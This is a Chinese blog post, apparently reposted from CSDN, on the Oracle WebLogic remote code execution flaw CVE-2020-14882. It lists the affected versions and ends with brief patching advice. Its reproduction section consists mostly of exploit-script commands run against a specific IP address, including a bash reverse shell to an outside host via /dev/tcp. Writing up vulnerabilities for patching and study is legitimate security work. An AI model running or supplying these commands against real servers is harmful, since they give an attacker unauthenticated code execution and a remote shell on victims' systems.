weblogic 远程代码执行 (CVE-2020-14882)
作者:互联网
weblogic 远程代码执行 (CVE-2020-14882)
weblogic 远程代码执行 (CVE-2020-14882)
0x01 漏洞描述
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。
0x02 影响范围
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
0x03 漏洞复现
工具
cve-2020-14882_rce.py
python3 使用
查看用法
python cve-2020-14882_rce.py
whoami
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c whoami
ls /tmp
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c “ls /tmp”
反弹shell
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c "bash -i >& /dev/tcp/119.29.67.4/9897 0>&1"
虽然显示漏洞检查失败 但是执行成功
0x04 漏洞修复
安装官方最新补丁进行升级:
https://www.oracle.com/security-alerts
由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。
标签:14882,py,Server,漏洞,2020,代码执行,Oracle 来源: https://blog.csdn.net/YouthBelief/article/details/121132932